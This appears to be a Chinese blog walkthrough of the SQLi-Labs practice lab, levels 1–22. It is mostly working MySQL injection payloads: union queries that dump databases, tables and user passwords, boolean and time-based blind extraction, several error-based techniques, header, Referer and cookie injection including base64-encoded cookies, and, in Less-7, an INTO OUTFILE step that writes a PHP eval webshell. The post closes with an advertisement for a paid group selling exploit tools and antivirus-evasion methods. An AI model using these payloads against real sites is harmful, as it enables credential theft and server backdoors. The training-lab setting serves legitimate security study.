当前位置: 首页 > news >正文

【SQLi_Labs】Basic Challenges

什么是人生?人生就是永不休止的奋斗!

Less-1

尝试添加’注入,发现报错

在这里插入图片描述

这里我们就可以直接发现报错的地方,直接将后面注释,然后使用

1’ order by 3%23

//得到列数为3

在这里插入图片描述

//这里用-1是为了查询一个不存在的id,好让第一句结果为空,直接显示第二句的结果

-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata%23

//得到数据库名

在这里插入图片描述

//得到表名

-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= ‘security’%23

如下

在这里插入图片描述

//得到列名

-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name= ‘users’%23

如下

在这里插入图片描述

//爆破得到数据

-1’ union select 1,username,password from users where id=3%23

如下

在这里插入图片描述

Less-2

在添加’之后,得到返回

在这里插入图片描述

可以得到这个sql语句其实并没有单引号,只是用数字进行查询,例如

select * from users where id=1

所以我们也可以跟上面一样,payloads:

-1 or 1=1%23

如下

在这里插入图片描述

Less-3

添加’之后,返回

在这里插入图片描述

可以得到大概的sql语句:

select * from users where id=(‘input’) LIMIT 0,1;

所以我们可以需要闭合)。

-1’) or 1=1%23

如下

在这里插入图片描述

Less-4

尝试’并未发现报错,尝试"发现报错

在这里插入图片描述

可以得到大概的sql语句

select * from users where id = (“input”) LIMIT 0,1;

所以payload:

-1") or 1=1 %23

如下

在这里插入图片描述

Less-5

尝试’发现报错

在这里插入图片描述

猜测sql语句为

select * from users where id=‘input’ LIMIT 0,1;

如果尝试之前的注入方法,会发现不再会返回我们注入的信息,如果注入成功的话,页面会返回You are in…,出错的话就不会返回这个字符串,所以这里我们可以进行盲注。

使用left()

例如我们可以使用1’ and left(version(),1)=3%23这个payload进行测试,截取version()得到的最左侧的字符判断是否为3,如果为3则正常返回You are in…,否则不返回。

在这里插入图片描述

所以我们可以利用这个一步一步爆破得到1’ and left(version(),1)=5%23。爆破区间可以确定在/[0-9.]/。

采用1’and length(database())=8%23对数据库名字长度进行爆破,确定数据库名字长度之后,我们可以使用database()来进行爆破数据库名,采用1’ and left(database(),1)>‘a’%23这个payload进行测试,原理跟上述一致,看返回即可,直到截取长度与数据库名字一致为止,这里效率比较高的就是采用二分法进行盲注。

在这里插入图片描述

使用substr()、ascii()

也可以采用substr()、ascii()函数进行尝试:

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80%23 //截取数据库下第一个表的

在这里插入图片描述

第一个字符与80ascii值进行对比 找第二个字符只需要改成substr(‘xxx’,2,1)即可。 找第二个表改成limit 1,1

使用regexp()

1’ and 1=(select 1 from information_schema.columns where table_name=‘users’ and column_name regexp ‘^us[a-z]’ limit 0,1)%23 //users表中的列名是否有us**的列

在这里插入图片描述

使用ord()、mid()

1’ and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))= 68%23 //cast(username AS CHAR)将username转换成字符串

在这里插入图片描述

//IFNULL(exp1,exp2)假如expr1不为NULL,则IFNULL()的返回值为expr1; 否则其返回值为expr2。IFNULL()的返回值是数字或是字符串,具体情况取决于其所使用的语境。 //ord将某个字符转换成ascii码,同ascii()

使用报错注入

Mysql报错注入原理分析(count()、rand()、group by)

超链接:https://www.cnblogs.com/xdans/p/5412468.html

1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

在这里插入图片描述

1' union select 1,count(*) ,concat((select user()),floor(rand(0)*2))x from security.users group by x%23

在这里插入图片描述

1’ union select (exp(~(select * FROM(SELECT USER())a))),2, 3–+ //exp报错

在这里插入图片描述

1’ union select (!(select * from (select user())x)- ~0),2,3–+ //bigint 溢出报错注入(这个单引号是微软拼音的中文单引号)

在这里插入图片描述

1’ and extractvalue(1,concat(0x7e,(select @@version),0x7e)) --+ //xpath报错注入

在这里插入图片描述

1’ and updatexml(1,concat(0x7e,(select @@version),0x7e),1) --+ //xpath报错注入

在这里插入图片描述

1’ union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x --+

在这里插入图片描述

使用延时注入

benchmark 是Mysql的一个内置函数,其作用是来测试一些函数的执行速度。benchmark() 中带有两个参数,第一个是执行的次数,第二个是要执行的函数或者是表达式

1’and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+

在这里插入图片描述

Less-6

没有回显,可以使用布尔盲注

1" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100–+

在这里插入图片描述

可以发现>100有回显,小于就没有,也可以用报错注入…

这里就是把Less-5 中的’改成"就行了

Less-7

使用文件导出,通过第Less-5的报错注入出绝对路径

1’ and updatexml(1,concat(0x7e,(select @@datadir),0x7e),1) --+

在这里插入图片描述

1’))UNION SELECT 1,2,3 into outfile “c:\wamp\www\sqlli b\Less-7\uuu.txt”%23

在这里插入图片描述

上图中显示 sql 出错了,但是没有关系,我们可以在文件中看到 uuu.txt 已经生成了

在这里插入图片描述

1’))UNION SELECT 1,2,‘<?php @eval($_post["mima"])?>’ into outfile “c:\wamp\www\sqllib\Less-7\yijuhua.php”–+

在这里插入图片描述

可以在文件中看到一句话木马已经导入进去了

在这里插入图片描述

Less-8

可以使用时间盲注,也可以用 bool 盲注

1’ and If(ascii(substr(database(),1,1))>115,1,sleep(5))–+

在这里插入图片描述

Less-9

同 Less-8 可以使用时间盲注

1’ and If(ascii(substr(database(),1,1))>115,1,sleep(5))–+

在这里插入图片描述

Less-10

1" and If(ascii(substr(database(),1,1))>115,1,sleep(5))–+

在这里插入图片描述

Less-11

报错注入,少一列就行了

1' union Select count(*),concat(0x3a,0x3a,(select group_concat(schema_name) from information_schema.schemata),0x3a,0x3a,floor(rand(0)*2))a from information_schema.schemata group by a#

在这里插入图片描述

1' union select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.columns group by x#

在这里插入图片描述

Less-12

1") union Select count(*),concat(0x3a,0x3a,(select group_concat(schema_name) from information_schema.schemata),0x3a,0x3a,floor(rand(0)*2))a from information_schema.schemata group by a#

在这里插入图片描述

1") union select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.columns group by x#

在这里插入图片描述

Less-13

1’) or 1=1#

在这里插入图片描述

成功登录,报错注入成功但是不回显,可以考虑盲注

1’) or ascii(substr((database()),1,1))>100#

在这里插入图片描述

Less-14

1" or 1=1#

在这里插入图片描述

成功登录,依然不能回显,尝试使用布尔盲注

1" or left(database(),1)=‘s’#

在这里插入图片描述

发现可以用updatexml进行报错注入

1" and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#

在这里插入图片描述

Less-15

1’ or 1=1#

在这里插入图片描述

成功登录,布尔注入或者时间盲注均可行

1’ or left(database(),1)=‘s’#

在这里插入图片描述

admin’ and If(ascii(substr(database(),1,1))>115,1,sleep(5))#

在这里插入图片描述

Less-16

1") or 1=1#

在这里插入图片描述

成功登录,布尔注入或者时间盲注均可行

1") or left(database(),1)=‘s’#

在这里插入图片描述

admin") and If(ascii(substr(database(),1,1))>115,1,sleep(5))#

在这里插入图片描述

Less-17

update注入,username过滤了很多,有password错误回显,考虑用报错注入

username=admin

password=1’ and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#

在这里插入图片描述

Less-18

登录成功后,页面提示

在这里插入图片描述

那么有可能是 ip 或者 UA 注入,看了一下发现是个 Header 头注入,这里需要注意这是登录成功的条件下才能触发的,而且既然是insert注入,需要用’1’='1闭合后面的 sql 语句,否则就是语法错误了

’ and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and ‘1’='1

在这里插入图片描述

’ and updatexml(1,concat(0x7e,(select @@version),0x7e),1),“1”,“1”)#

在这里插入图片描述

Less-19

登录成功后提示

在这里插入图片描述

于是我们可以知道是在Referer应该有注入点,在 Referer 处同样用

’ and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and ‘1’='1

在这里插入图片描述

可以注入

Less-20

cookie 注入,登录成功后修改 cookie 即可,注意删除post的参数

uname=’ and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and ‘1’='1

在这里插入图片描述

Less-21

登录成功后发现 cookie 加上了 base64

YOUR COOKIE : uname = YWRtaW4=

用上面的 payload 进行 base64 编码就行了,记得=要 urlencode

JyBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpLDEpIGFuZCAnMSc9JzE%3d

在这里插入图片描述

Less-22

同 21 ,单引号换成双引号即可

IiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpLDEpIGFuZCAiMSI9IjE%3d

本文poc、工具、源码加圈获取

1、本圈主要分享:攻防及SRC实战经验分享、代码审计漏洞详情及代码、最新漏洞详情及原创漏洞利用工具、免杀手法及工具代码、问题解答等。
2、圈主出身于深信服深蓝攻防实验室、新华三攻防实验室,连续5年多次获得国家级、省级、地市级、行业级护网攻击队前三名。
3、漏洞盒子总榜前五十名、补天总榜前五十名、去哪网SRC总榜前五十名。
4、获得50+CVE通用漏洞编号、100+CNVD通用漏洞证书。
5、CSDN、公众号、博客、先知社区、SecIN、FreeBuf粉丝量10000+。
6、前1-50名: 25¥,50-100名: 50¥,100-150名: 75¥,依次类推.....!

知识星球

img

纷传

img

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。


http://www.mrgr.cn/news/82073.html

相关文章:

  • 医学AI公开课第二期|写给癌症研究者的人工智能指南|公开课·25-01-03
  • Android 检测设备是否 Root
  • 二十三种设计模式-抽象工厂模式
  • Spring自动化创建脚本-解放繁琐的初始化配置!!!(自动化SSM整合)
  • 2025加密风云:行业变革与未来趋势全景透视
  • Linux 异步 I/O 框架 io_uring:基本原理、程序示例与性能压测
  • 某网站手势验证码识别深入浅出(全流程)
  • 大模型WebUI:Gradio全解系列9——Additional Features:补充特性(下)
  • NFS V4网络文件共享新认识——筑梦之路
  • SpringCloudAlibaba实战入门之路由网关Gateway过滤器(十三)
  • 云效流水线自动化部署前端纯静态web网站
  • 四大自平衡树对比:AVL树、红黑树、B树与B+树
  • 2024/12/29 黄冈师范学院计算机学院网络工程《路由期末复习作业一》
  • 从0到机器视觉工程师(一):机器视觉工业相机总结
  • 【Leetcode 每日一题 - 扩展】面试题 04.10. 检查子树
  • 初始nginx
  • 因数据库表被锁死导致服务假死的排查和解决过程
  • 混合合并两个pdf文件
  • vue实现下拉多选、可搜索、全选功能
  • Vue多页面路由与模版解析
  • 自动驾驶新纪元:城区NOA功能如何成为智能驾驶技术的分水岭
  • SpringAI从入门到熟练
  • FreeRTOS Lwip Socket APi TCP Server 1对多
  • 大模型WebUI:Gradio全解系列8——Additional Features:补充特性(上)
  • 小米路由器开启SSH,配置阿里云ddns,开启外网访问SSH和WEB管理界面
  • Isaac Sim Docker 中使用 Python 脚本